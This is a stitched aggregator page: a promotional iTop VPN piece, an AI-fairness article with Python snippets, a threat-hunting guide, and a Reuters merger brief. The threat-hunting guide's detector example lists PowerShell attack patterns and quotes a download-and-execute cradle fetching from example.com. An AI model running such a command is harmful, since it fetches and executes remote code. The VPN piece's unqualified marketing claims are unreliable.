
Big Data

Why choose iTop VPN for Windows

Published

on

A free VPN for Windows lets you unblock restricted apps and websites, protect your privacy on public Wi-Fi, and browse without limitations. iTop VPN encrypts your traffic through a military-grade private tunnel and hides your IP address, while offering fast speeds and generous bandwidth.

Features of iTop VPN for Windows

  • It encrypts all internet traffic entering and leaving your device.
  • It prevents your data from being captured, collected, or spied on by third parties.
  • It keeps digital activities, such as your browsing history, from being tracked.
  • Its server network spans the globe, with free service available in most countries.
  • It disguises your physical location from websites that use location services.
  • It grants access to geo-restricted websites: because your real IP address cannot be tracked, sites see an IP address from a different country, so geo-restricted content can be visited readily.
  • Its military-grade encryption lets you safely surf public, business, and school networks.

iTop VPN for Windows is Simple to Use
iTop VPN is a free VPN for Windows that you can set up in a few steps. The application has a very user-friendly layout and delivers the speed you need. iTop VPN keeps your traffic from being intercepted and your data safe and secure. It unblocks geo-restricted content and lets you browse without limits.
iTop VPN lets you use the company’s regular service at no cost. This free VPN for Windows is a powerful VPN proxy that helps you bypass filters, censorship, and surveillance by masking your IP address, all with a single one-click connection. It also unblocks geo-restricted web content, helps protect your public or home network from unauthorized access, and lets you conduct digital transactions with less risk.

Final Thoughts
This is a safe, fast network that lets you use the internet anonymously. With this free VPN, you can easily secure your Wi-Fi connection as well as your IP address. Its popularity is growing by the day: it is an ever-evolving product with bug-free internet access and a user-friendly interface, and the developer ships new features with every update. The majority of users are satisfied with the product, and the service has received praise from around the world. According to user ratings, iTop VPN is among the best programs for providing a safe and private connection. Sign up for safe browsing right now.

Continue Reading

AI

The Third Pillar of Trusted AI: Ethics


By Scott Reed.

Building an accurate, fast, and performant model founded upon strong Data Quality standards is no easy task. Taking the model into production with governance workflows and monitoring for sustainability is even more challenging. Finally, ensuring the model is explainable, transparent, and fair based on your organization’s ethics and values is the most difficult aspect of trusted AI.

We have identified three pillars of trust: performance, operations, and ethics. In our previous articles, we covered performance and operations. In this article, we will look at our third and final pillar of trust, ethics.

Ethics relates to the question: “How well does my model align with my organization’s ethics and values?” This pillar primarily focuses on understanding and explaining the mystique of model predictions, as well as identifying and neutralizing any hidden sources of bias. There are four primary components to ethics: 

  • Privacy
  • Bias and fairness
  • Explainability and transparency
  • Impact on the organization

In this article, we will focus on two in particular: bias and fairness and explainability and transparency. 

Bias and Fairness

Examples of algorithmic bias are everywhere today, oftentimes relating to the protected attributes of gender or race, and existing across almost every vertical, including health care, housing, and human resources. As AI becomes more prevalent and accepted in society, the number of incidents of AI bias will only increase without standardized responsible AI practices.

Let’s define bias and fairness before moving on. Bias refers to situations in which, mathematically, the model performs differently (better or worse) for distinct groups in the data. Fairness, on the other hand, is a social construct, subjective based on stakeholders, legal regulations, or values. The intersection between the two lies in context and the interpretation of test results.

At the highest level, measuring bias can be split into two categories: fairness by representation and fairness by error. The former means measuring fairness based on the model’s predictions among all groups, while the latter means measuring fairness based on the model’s error rate among all groups. The idea is to know if the model is predicting favorable outcomes at a significantly higher rate for a particular group in fairness by representation, or if the model is wrong more often for a particular group in fairness by error. Within these two families, there are individual metrics that can be applied. Let’s look at a couple of examples to demonstrate this point.

In a hiring use case where we are predicting if an applicant will be hired or not, we would measure bias within a protected attribute such as gender. In this case, we may use a metric like proportional parity, which satisfies fairness by representation by requiring each group to receive the same percentage of favorable predictions (i.e., the model predicts “hired” 50% of the time for both males and females). 
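As a sketch, proportional parity can be checked in a few lines of Python; the hiring data below is hypothetical, and the function simply compares the rate of favorable predictions across groups:

```python
from collections import defaultdict

def favorable_rate_by_group(groups, predictions, favorable=1):
    """Rate of favorable predictions for each group."""
    counts = defaultdict(lambda: [0, 0])  # group -> [favorable, total]
    for g, p in zip(groups, predictions):
        counts[g][1] += 1
        if p == favorable:
            counts[g][0] += 1
    return {g: fav / total for g, (fav, total) in counts.items()}

# Hypothetical hiring predictions (1 = "hired")
groups      = ["M", "M", "M", "M", "F", "F", "F", "F"]
predictions = [ 1,   1,   0,   0,   1,   0,   0,   0 ]

rates = favorable_rate_by_group(groups, predictions)
# Proportional parity compares these per-group rates; here males receive
# favorable predictions at twice the rate of females.
print(rates)  # {'M': 0.5, 'F': 0.25}
```

A large gap between the rates is the signal that the representation criterion is violated; what counts as "too large" is the subjective, fairness side of the question.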

Next, consider a medical diagnosis use case for a life-threatening disease. This time, we may use a metric like favorable predictive value parity, which satisfies fairness by equal error by requiring each group to have the same precision, or probability of the model being correct. 
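A minimal sketch of checking predictive value parity, again on made-up data: for each group we compute precision, i.e., how often the model is right when it predicts the favorable outcome.

```python
from collections import defaultdict

def precision_by_group(groups, y_true, y_pred, favorable=1):
    """Precision (positive predictive value) per group: of the cases the
    model flagged as favorable, how many actually were?"""
    stats = defaultdict(lambda: [0, 0])  # group -> [true positives, predicted positives]
    for g, t, p in zip(groups, y_true, y_pred):
        if p == favorable:
            stats[g][1] += 1
            if t == favorable:
                stats[g][0] += 1
    return {g: tp / pp for g, (tp, pp) in stats.items() if pp}

# Hypothetical diagnosis data
groups = ["A", "A", "A", "B", "B", "B"]
y_true = [1, 0, 1, 1, 1, 0]
y_pred = [1, 1, 0, 1, 1, 0]

print(precision_by_group(groups, y_true, y_pred))
```

In this toy example the model is correct only half the time when it flags group A but always correct for group B, exactly the kind of error-rate disparity that fairness by error is designed to catch.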

Once bias is identified, there are several different ways to mitigate and force the model to be fair. Initially, you can analyze your underlying data, and determine if there are any steps in data curation or feature engineering that may assist. However, if a more algorithmic approach is required, there are a variety of techniques that have emerged to assist. At a high level, those techniques can be classified by the stage of the machine learning pipeline in which they are applied:

  • Pre-processing
  • In-processing
  • Post-processing

Pre-processing mitigation happens before any modeling takes place, directly on the training data. In-processing techniques relate to actions taken during the modeling process (i.e., training). Finally, post-processing techniques occur after the modeling process and operate on the model’s predictions to mitigate bias.
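As one illustration of the pre-processing family, a reweighing scheme in the style of Kamiran and Calders assigns each training example a weight so that group membership and outcome become statistically independent in the weighted data (the data below is fabricated):

```python
from collections import Counter

def reweighing_weights(groups, labels):
    """Pre-processing mitigation sketch: weight each (group, label)
    combination by P(group) * P(label) / P(group, label), so that group
    and outcome are independent in the weighted training data."""
    n = len(labels)
    group_counts = Counter(groups)
    label_counts = Counter(labels)
    joint_counts = Counter(zip(groups, labels))
    return {
        (g, y): (group_counts[g] * label_counts[y]) / (n * joint_counts[(g, y)])
        for (g, y) in joint_counts
    }

# Hypothetical training data: males receive the favorable label (1)
# twice as often as females.
groups = ["M", "M", "M", "F", "F", "F"]
labels = [1, 1, 0, 1, 0, 0]

weights = reweighing_weights(groups, labels)
# Under-represented combinations such as ("F", 1) get weights above 1,
# over-represented ones such as ("M", 1) get weights below 1.
```

These weights would then be passed to any learner that accepts per-sample weights, leaving the features themselves untouched.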

Explainability and Transparency

All Data Science practitioners have been in a meeting where they were caught off-guard trying to explain the inner workings of a model or the model’s predictions. From experience, I know that isn’t a pleasant feeling, but those stakeholders had a point. Trust in ethics also means being able to interpret, or explain, the model and its results as well as possible. 

Explainability should be a part of the conversation when selecting which model to put into production. Choosing a more explainable model is a great way to build rapport between the model and all stakeholders. Certain models are more easily explainable and transparent than others – for example, models that use coefficients (i.e., linear regression) or ones that are tree-based (i.e., random forest). These are very different from deep learning models, which are far less intuitive. The question becomes, should we sacrifice a bit of model performance for a model that we can explain?

At the model prediction level, we can leverage explanation techniques like XEMP or SHAP to understand why a particular prediction was assigned to the favorable or unfavorable outcome. Both methods are able to show which features contribute most, in a negative or positive way, to an individual prediction. 
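XEMP and SHAP require dedicated tooling, but the additive idea behind them can be sketched for a linear model, where each feature’s contribution to a single prediction is just its coefficient times the feature’s deviation from a baseline such as the training mean. The names and numbers below are illustrative:

```python
def linear_contributions(coefs, x, baseline):
    """For a linear model, each feature's contribution to one prediction
    relative to a baseline is coef * (value - baseline) -- the intuition
    behind additive explanation methods such as SHAP."""
    return {name: coefs[name] * (x[name] - baseline[name]) for name in coefs}

# Hypothetical hiring-score model
coefs    = {"years_experience": 0.8, "interview_score": 1.2}
x        = {"years_experience": 5.0, "interview_score": 3.0}
baseline = {"years_experience": 4.0, "interview_score": 4.0}

contribs = linear_contributions(coefs, x, baseline)
# years_experience pushes this prediction up; interview_score pulls it down.
print(contribs)
```

Methods like SHAP generalize this decomposition to arbitrary models, which is why their outputs can be read the same way: per-feature, signed contributions to one prediction.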

Conclusion

In this series, we have covered the three pillars of trust in AI: performance, operations, and ethics. Each plays a significant role in the lifecycle of an AI project. While we’ve covered them in separate articles, in order to fully trust an AI system, there are no trade-offs between the pillars. Enacting trusted AI requires buy-in at all levels and a commitment to each of these pillars. It won’t be an easy journey, but it is a necessity if we want to ensure the maximum benefit and minimize the potential for harm through AI. 

Source: https://www.dataversity.net/the-third-pillar-of-trusted-ai-ethics/


Big Data

How to Plan a Threat Hunt: Using Log Analytics to Manage Data in Depth


By Thomas Hazel.

Security analysts have long been challenged to keep up with growing volumes of increasingly sophisticated cyberattacks, but their struggles have recently grown more acute.

Only 46% of security operations leaders are satisfied with their team’s ability to detect threats, and 82% of decision-makers report that their responses to threats are mostly or completely reactive – a shortcoming they’d like to overcome.

The reactive approach to threat detection that so many security programs continue to follow is nothing new. Throughout most of its evolution, the field of cybersecurity has adapted itself to each novel attack technique that cybercriminals have come up with. The first commercial antivirus programs operated by following in attackers’ footsteps, updating their databases of known malware signatures each time researchers discovered a new strain of malicious code. Enterprises followed suit, deploying additional perimeter-based technologies each time a new one came out – usually to counter the latest threat.

In today’s cloud-centric and data-intensive computing environments, however, reactive defense strategies simply don’t work. The legacy assumption that threats can be kept out of a trusted internal corporate network has been rendered obsolete by borderless network architectures and “anyone, anytime, anywhere, any device” connectivity needs.

The growing frequency and growing impact of advanced persistent threats (APTs) – coupled with the recognition that spending alone cannot sufficiently protect their organization – is driving a renewed interest in threat hunting. Cybersecurity leaders recognize that passive controls and existing security technologies are limited in terms of what kinds of malicious activity they can uncover, and how quickly and efficiently they can do so. In contrast, threat hunting is the proactive approach of uncovering the threats that linger within the environment. And like the threat adversaries that they are up against, threat hunting relies as much on human savvy as on technology.

The good news is that using existing SecOps personnel, and the technologies already in place, organizations can ramp up an effective threat hunting capability rapidly.

What Is Threat Hunting?

Threat hunting is a proactive approach to cyber defense that’s predicated upon an “assume breach” mindset. A threat hunter commences work with the operating assumption that a breach has already occurred; the hunt is a methodical search for evidence of the attackers’ presence.

Because it enables security teams to address gaps in their existing operational processes and tooling, security organizations that implement hunting programs can dramatically improve their overall security posture.

Let’s walk you through how modern threat hunting tactics can help your enterprise reduce risk and increase efficiencies, all while revolutionizing your data cloud strategy for optimal security.

Build Threat Hunting Capabilities

Unlike most other SecOps roles, the threat hunter will purposefully seek out evidence of malicious activities that did not generate security alerts, using a methodical approach and multi-dimensional data analytics tools. The primary objective of threat hunting is to intercept potential attacks before damage is done, or to mitigate the damage of an attack in progress.

Effective threat hunting relies on a mindset and a methodical approach that allows the security analyst to think like a threat actor and use that understanding to determine what clues to look for to identify an attack underway. While experience certainly helps, the ever-changing landscape of threat actors, and their sophistication, requires the threat hunter to take a disciplined approach that structures a methodical hunt based on updated tools, techniques, and procedures (TTPs) of top global threat actors. Today’s threat hunter relies on a repeatable framework that allows the hunter to think through the stages of an attack, and then determine the clues or evidence to search for.

In addition, a foundation in core SecOps concepts and technologies allows for efficiency in hunting threats, including malware analysis, penetration testing, incident response, and forensics. Formal training programs are also available, offered through industry organizations like ISACA and the SANS Institute. To further build threat hunting capabilities, you should take the following steps.

1. Think Like Your Adversary

Like a good CIA agent, top threat hunters begin by adopting the mindset of their adversary. Thinking like an adversary allows the hunter to think through how to stage a successful attack. This begins by understanding the common stages that a sophisticated attack might take.

Though adversaries are always seeking to enhance their capabilities by exploiting previously undiscovered vulnerabilities or honing new techniques, the majority of attacks follow the same general trajectory – from initial compromise that gives them a beachhead in the environment, all the way through to data exfiltration (or another means of achieving the objective, like using ransomware rather than exfiltration to monetize their efforts).

Cybersecurity experts and threat researchers have identified six common steps of a typical sophisticated attack, or advanced persistent threat (APT).

Understanding these steps allows the threat hunter to define the potential clues of malicious behavior that align with one or more of the stages. This becomes a process of thinking through the tools an attacker might use at each stage, and the trail of evidence – however faint – that would be left behind. In many cases, attackers will seek to exploit existing, sanctioned tools that are already in the environment in their attempt to avoid detection. Thus, when planning, threat hunters think through how to find unusual usage of these commonly used tools, in order to home in on potential cases in which they are being hijacked for malicious purposes.

2. Analyze Your Data in Depth

Threat hunting involves investigating a hypothesized attack scenario, rather than following up on an alert that existing security tools have generated.

Lacking the clear-cut evidence that would trigger an alarm, threat hunting requires the hunter to gather intelligence, by conducting various analyses on the data in the environment. Indeed, the most successful hunt teams rely on large-scale data aggregation and analysis that go beyond many other use cases of log data (e.g., IT monitoring).

One of the most important determinants of a security organization’s hunting ability is the quantity and quality of the log data it collects and makes available to the SecOps team. A majority of security professionals believe that enriching the systems in their security operations center (SOC) with additional data sources is the most important step they could take in order to enhance their threat hunting capabilities.

Broadly speaking, threat hunters need access to both host and network data sources as well as cloud application logs. Host logs can be collected via an agent or through native logging applications like Windows Event Forwarding, the Sysmon utility, auditing services for Linux architectures, or unified logging for MacOS. These logs should provide visibility into how configuration management utilities like PowerShell are being used within the environment, since these tools are commonly exploited by attackers seeking to maintain persistence while keeping a low profile.
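As an illustration of the visibility this buys, a few lines of Python can sweep collected PowerShell command lines for patterns that commonly warrant a closer look. The patterns and log lines below are illustrative, not a complete detection rule set:

```python
import re

# Hypothetical patterns that often merit review in PowerShell logs:
# encoded commands, download cradles, and execution-policy bypasses.
SUSPICIOUS = [
    re.compile(r"-enc(odedcommand)?\s", re.IGNORECASE),
    re.compile(r"downloadstring|invoke-webrequest", re.IGNORECASE),
    re.compile(r"-exec(utionpolicy)?\s+bypass", re.IGNORECASE),
]

def flag_powershell_events(log_lines):
    """Return the log lines whose command text matches any suspicious pattern."""
    return [line for line in log_lines
            if any(p.search(line) for p in SUSPICIOUS)]

logs = [
    "powershell.exe -NoProfile Get-ChildItem C:\\Users",
    "powershell.exe -enc SQBFAFgA...",
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.com/p')",
]
print(flag_powershell_events(logs))  # flags the second and third lines
```

In practice these patterns would be tuned against the environment’s baseline, since legitimate administration scripts also use encoded commands.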

Which specific data sources are needed for a particular hunt depends on the hypothesis that’s under investigation. Standard knowledge bases and frameworks such as MITRE ATT&CK associate a list of data sources that can be examined for evidence of each TTP they include.
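A hunt team might encode that association as a simple lookup. The technique IDs below are real ATT&CK identifiers (T1059.001 for PowerShell, T1047 for WMI), but the data-source entries are illustrative examples rather than the full ATT&CK listing:

```python
# Illustrative mapping from ATT&CK technique IDs to the data sources a
# hunt for that technique would examine.
TTP_DATA_SOURCES = {
    "T1059.001": ["powershell_logs", "process_monitoring",
                  "process_command_line", "windows_event_logs"],  # PowerShell
    "T1047":     ["authentication_logs", "netflow",
                  "process_monitoring", "process_command_line"],  # WMI
}

def sources_for_hunt(technique_ids):
    """Union of the data sources needed to hunt a set of techniques."""
    needed = set()
    for tid in technique_ids:
        needed.update(TTP_DATA_SOURCES.get(tid, []))
    return sorted(needed)

print(sources_for_hunt(["T1059.001", "T1047"]))
```

Planning a hunt then becomes a matter of picking the hypothesized techniques and confirming that each required data source is actually being collected.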

Because both the IT organization and the global cyberthreat landscape are constantly changing, the data platforms hunters rely on must be able to ingest and index a wide variety of data types from a wide variety of sources at speed. They also need to be flexible enough to incorporate additional sources without re-extracting, transforming, and loading (ETL) the original data set.

Data Sources with Hunt Types: Examples of Attack Scenarios

Many different threat groups and adversaries make use of malicious PowerShell commands.

Attackers with elevated privileges can remain undetected for long periods of time while performing exploratory, command-and-control (C2), and malicious file execution activities using this powerful Windows scripting environment, which can execute commands locally and on remote computers. Attackers often leverage PowerShell to maintain persistence in an environment without needing to install malware. Data sources required to hunt for PowerShell-based attacks include DLL monitoring, file monitoring, PowerShell logs, process command-line parameters, process monitoring, and Windows event logs.

In another illustrative example, hunters might search for signs that attackers are leveraging Microsoft’s Component Object Model (COM) – a set of standards that enable Microsoft Office products to seamlessly interact – to execute malicious code, manipulate software classes in the current user registry, and through these activities, maintain persistence without being noticed.

If you’re looking for evidence that this technique has been employed, you should include DLL monitoring, loaded DLLs, process command-line parameters, process monitoring, and Windows registry monitoring among your data sources.

A third case in point: to locate valuable data or other resources of interest, attackers typically undertake a discovery and exploration process, moving across the network to figure out the lay of the land.

While doing so, attackers often attempt to employ tools that allow them to authenticate to remote systems or execute commands on remote hosts. Windows Management Instrumentation (WMI) is frequently used for this purpose by attackers trying to gain remote access to Windows system components. Data sources that can reveal this attack technique to your hunt team include authentication logs, Netflow data, process command-line parameters, and process monitoring.
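One simple way to turn such data sources into a hunt lead is an outlier check on remote authentication counts per host. This is a deliberately minimal z-score sketch on fabricated events, not a production detection:

```python
from collections import Counter
from statistics import mean, pstdev

def flag_anomalous_hosts(auth_events, z_threshold=2.0):
    """Flag hosts whose count of remote authentication events sits far
    above the fleet average (simple z-score outlier check)."""
    counts = Counter(host for host, _ in auth_events)
    values = list(counts.values())
    mu, sigma = mean(values), pstdev(values)
    if sigma == 0:
        return []
    return [h for h, c in counts.items() if (c - mu) / sigma > z_threshold]

# Hypothetical (host, remote_user) authentication events: six workstations
# with a handful of logons each, and one server with an unusual burst.
events = ([("ws-01", "alice")] * 2 + [("ws-02", "bob")] * 3 +
          [("ws-03", "carol")] * 2 + [("ws-04", "dave")] * 3 +
          [("ws-05", "erin")] * 2 + [("ws-06", "frank")] * 3 +
          [("srv-db", "svc_admin")] * 40)
print(flag_anomalous_hosts(events))
```

A flagged host is a lead, not a verdict: the hunter would pivot into process and command-line data on that host to confirm or dismiss the hypothesis.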

Access the Data: Central Log Management, SIEM Platform, or Both?

It’s common for security teams to rely on existing SIEM platforms for threat hunting. However, most SIEM solutions were designed and implemented for compliance and reporting purposes and thus may have limitations when it comes to threat hunting.

SIEM Drawbacks

  1. Labor-intensive and complex to manage
  2. Limited in the number of log data types or amount of contextual information they’re able to ingest
  3. Bound by licensing models that make it cost-prohibitive to store data for longer retention periods
  4. Subject to performance issues (slow search) as data volumes increase

To level up threat hunting capabilities, security leaders often choose to supplement SIEM with a centralized log management solution. These tools aren’t competitive but complementary.

In this strategy the two work in parallel, with the data lake platform ingesting logs forwarded from the SIEM. It’s also possible to split the data between the two using an automated data pipeline.

Plan Your Threat Hunt 

Once you’ve found the people and instituted the processes, next comes the technology that allows flexible, integrated access to your data.

Initially developed to serve as the user interface for the Elasticsearch search engine, Kibana has grown into one of the most widely used data analytic tools in threat hunting today.

Kibana is both powerful and flexible, allowing threat hunters to conduct a wide range of queries, perform data correlations, and create data visualizations that help uncover the hidden insights within the data sets. Its capabilities include drill-down dashboard building, time series analysis, and the ability to create a wide array of visualizations including bar and pie charts, tables, histograms, and maps. These visualization capabilities allow threat hunters to search through large volumes of aggregated data to quickly identify outliers in a manner that’s efficient and consistent.
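Kibana searches ultimately compile down to Elasticsearch’s query DSL. As a sketch, a hunt query that aggregates a week of PowerShell process events by command line might look like the following; the index field names are assumptions, while the bool-filter/range/terms structure is standard query DSL:

```python
import json

# Hypothetical field names; the structure (bool filter + range +
# terms aggregation) is standard Elasticsearch query DSL.
hunt_query = {
    "query": {
        "bool": {
            "filter": [
                {"match": {"process.name": "powershell.exe"}},
                {"range": {"@timestamp": {"gte": "now-7d", "lte": "now"}}},
            ]
        }
    },
    "aggs": {
        "by_command_line": {
            "terms": {"field": "process.command_line.keyword", "size": 25}
        }
    },
    "size": 0,  # return only the aggregation buckets, not raw hits
}

print(json.dumps(hunt_query, indent=2))
```

The resulting buckets give the hunter a ranked view of the most common command lines over the window, making the rare, unusual invocations easy to spot at the tail.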

Some organizations go further, coupling Kibana with data platforms that enable search and analysis of security log data at scale. This means even resource-constrained security teams can create a security data lake in the cloud to facilitate and accelerate threat hunting.

It is vital that organizations retain large volumes of historical log data from a broad array of sources, so that proactive threat hunting can proceed at a rapid pace, uncovering the clues that even the most sophisticated attackers inevitably leave behind.

Ready to start the hunt? 

Source: https://www.dataversity.net/how-to-plan-a-threat-hunt-using-log-analytics-to-manage-data-in-depth/


Big Data

Axiata, Telenor sign deal to merge Malaysian telecoms units


OSLO (Reuters) – Malaysian telecoms firm Axiata Group Bhd and Norway’s Telenor ASA have agreed to merge their mobile operations in Malaysia, forming a new market leader in the Southeast Asian nation, the two firms said on Monday.

The planned transaction, which remains subject to regulatory and other approvals, is expected to be completed by the second quarter of 2022, the firms said.

Telenor and Axiata will each own 33.1% of the merged firm, which will remain listed in Kuala Lumpur. As part of the deal, Axiata will also receive $470 million in cash, in line with a preliminary agreement announced in April.

As a result of the deal, the companies plan cost cuts and savings on capital expenditure with a net present value amounting to some $2 billion, Telenor said in a statement.

(Reporting by Terje Solsvik; Editing by Christopher Cushing)

Image Credit: Reuters

Source: https://datafloq.com/read/axiata-telenor-sign-deal-merge-malaysian-telecoms-units/15620


Big Data

Exploring Mito: Automatic Python Code for SpreadSheet Operations




Source: https://www.analyticsvidhya.com/blog/2021/06/exploring-mito-automatic-python-code-for-spreadsheet-operations/
